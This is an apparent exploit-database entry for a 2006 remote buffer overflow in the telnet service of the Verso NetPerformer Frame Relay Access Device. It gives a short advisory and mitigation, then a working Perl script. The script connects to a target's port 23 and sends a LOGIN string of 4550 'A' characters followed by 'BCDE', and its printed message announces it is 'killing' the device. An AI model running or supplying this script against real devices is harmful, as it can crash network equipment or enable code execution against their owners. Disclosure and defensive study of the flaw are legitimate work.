Verso NetPerformer Frame Relay Access Device (FRAD) Remote Buffer Overflow Vulnerability

vendor:

NetPerformer Frame Relay Access Device (FRAD)

by:

Modhiar

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: NetPerformer Frame Relay Access Device (FRAD)

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Verso NetPerformer Frame Relay Access Device (FRAD) Remote Buffer Overflow Vulnerability

A remote attacker can exploit this issue to execute arbitrary code on the affected device. Failed exploit attempts will likely crash the device, denying service to legitimate users. The exploit code is written in Perl and it sends a LOGIN command with an overly long string of 'A' characters followed by 'BCDE' to the telnet service on port 23.

Mitigation:

Upgrade to the latest version of Verso NetPerformer Frame Relay Access Device (FRAD)

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19989/info

Verso NetPerformer Frame Relay Access Device (FRAD) is prone to a remotely exploitable buffer overflow in the telnet service.

A remote attacker can exploit this issue to execute arbitrary code on the affected device. Failed exploit attempts will likely crash the device, denying service to legitimate users.

# __START_CODE
#
#!/usr/bin/perl

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "23",

Proto    => "TCP"))
{
                 print "Modhiar'000 ..... killing netperformer ... $ARGV[0]
port 23...";
                 sleep(1);
                 print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
                 sleep(1);
                 print $socket "PASS " . "\r\n";
                 close($socket);
}
else
{
                 print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE